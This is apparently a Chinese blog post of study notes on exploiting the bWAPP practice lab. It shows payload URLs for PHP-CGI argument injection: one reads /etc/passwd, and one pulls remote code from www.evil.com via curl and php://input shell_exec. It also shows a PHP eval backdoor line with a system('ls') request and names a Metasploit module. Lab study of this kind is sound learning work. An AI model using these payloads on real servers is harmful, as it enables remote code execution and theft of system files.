bwapp–using-know-vn

正文:

由于本人比较懒,只对自己不是了解的几个漏洞基础知识进行学习。

一. PHP-CGI远程任意代码执行漏洞

是php5.3之前版本漏洞,老的了
cgi基础知识学习
PHP-CGI远程任意代码执行漏洞
执行:
本地:
http://192.168.244.170/bWAPP/admin/phpinfo.php?-dauto_prepend_file%3d/etc/passwd+-n
远程:
curl http://target.com/test.php?-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3a%2f%2Fwww.evil.com%2fevil.txt
https://www.jb51.net/article/113124.htm
参考了下,不知为什么执行不成功。
-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
<?php echo shell_exec[‘id’];?>
2.msf
use exploit/multi/http/php_cgi_arg_injection
set一系列参数
最后选了几个payload都没有成功,就没有继续尝试了

二.php eval

@eval($_REQUEST[“eval”]);
http://192.168.244.170/bWAPP/php_eval.php?eval=system(%22ls%22);

三.Shellshock Vulnerability (CGI)

在header头改
 
2018.8.4

发表评论

电子邮件地址不会被公开。 必填项已用*标注